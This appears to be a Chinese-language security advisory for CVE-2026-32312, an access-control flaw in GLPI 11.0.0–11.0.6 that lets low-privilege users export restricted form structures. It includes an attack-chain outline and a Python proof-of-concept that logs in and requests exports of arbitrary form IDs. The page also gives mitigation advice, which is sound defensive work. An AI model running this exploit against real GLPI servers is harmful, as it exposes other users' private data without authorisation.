CVE-2026-32312 CVSS 4.3 中危

CVE-2026-32312 GLPI表单结构未授权访问漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32312

漏洞类型

权限绕过 / 信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GLPI

漏洞概述

GLPI是一款开源的IT资产和设备管理软件。在11.0.0至11.0.6版本中，系统存在一处权限验证逻辑缺陷。具体而言，仅拥有表单“READ”权限的经过身份验证用户，可以利用该漏洞导出其本无权访问的未授权表单的结构信息。这属于典型的水平权限绕过问题，可能导致敏感配置信息的泄露。官方已在11.0.7版本中修复了此漏洞，建议相关管理员立即进行升级。

技术细节

该漏洞的核心在于GLPI在处理表单导出功能时，实施了不完善的访问控制策略。在受影响的版本中，系统仅验证了发起请求的用户是否具有全局的“forms READ”权限，而未进一步验证用户是否有权访问请求中指定的特定表单对象ID。这构成了不安全的直接对象引用（IDOR）漏洞。攻击者利用此缺陷，通过遍历表单ID并发送导出请求，即可绕过业务逻辑层的权限限制，获取其他部门或管理员创建的私有表单结构数据，从而造成敏感信息泄露。

攻击链分析

STEP 1

身份认证

攻击者使用低权限账户登录GLPI系统，该账户仅需拥有基本的表单读取权限（forms READ permission）。

STEP 2

请求构造

攻击者分析出导出表单的API接口，并构造特定HTTP请求，在参数中指定目标未授权表单的ID。

STEP 3

权限绕过

服务器端接收到请求后，仅检查了用户的全局表单读取权限，未校验用户是否具备目标表单的访问权。

STEP 4

信息获取

系统返回目标未授权表单的结构数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_glpi_cve(target, username, password, form_id):
    """
    PoC for CVE-2026-32312
    Exploits unauthorized form structure export in GLPI 11.0.0-11.0.6
    """
    session = requests.Session()

    # 1. Authentication
    login_url = f"{target}/front/login.php"
    auth_data = {
        "login_name": username,
        "login_password": password,
        "submit": "Post"
    }
    session.post(login_url, data=auth_data)

    # 2. Exploit Attempt - Export Unauthorized Form
    # Note: Endpoint might vary based on GLPI configuration, typically /front/form.form.php
    export_url = f"{target}/front/form.form.php"
    params = {
        "action": "export",  # Specific action to trigger the export
        "id": form_id         # Target form ID that the user should not have access to
    }

    response = session.get(export_url, params=params)

    if response.status_code == 200 and "structure" in response.text:
        print(f"[+] Successfully exported form ID {form_id}:")
        print(response.text[:500]) # Print first 500 chars
    else:
        print(f"[-] Failed to export form or access denied.")

if __name__ == "__main__":
    TARGET = "http://127.0.0.1/glpi"
    USER = "low_priv_user"
    PASS = "user_pass"
    TARGET_FORM_ID = "2" # ID of a restricted form
    exploit_glpi_cve(TARGET, USER, PASS, TARGET_FORM_ID)

影响范围

GLPI 11.0.0

GLPI 11.0.1

GLPI 11.0.2

GLPI 11.0.3

GLPI 11.0.4

GLPI 11.0.5

GLPI 11.0.6

防御指南

临时缓解措施

在无法立即升级的情况下，管理员应严格限制用户权限，确保普通用户仅能访问其业务范围内的表单，并监控审计日志中是否存在针对非授权表单ID的导出请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表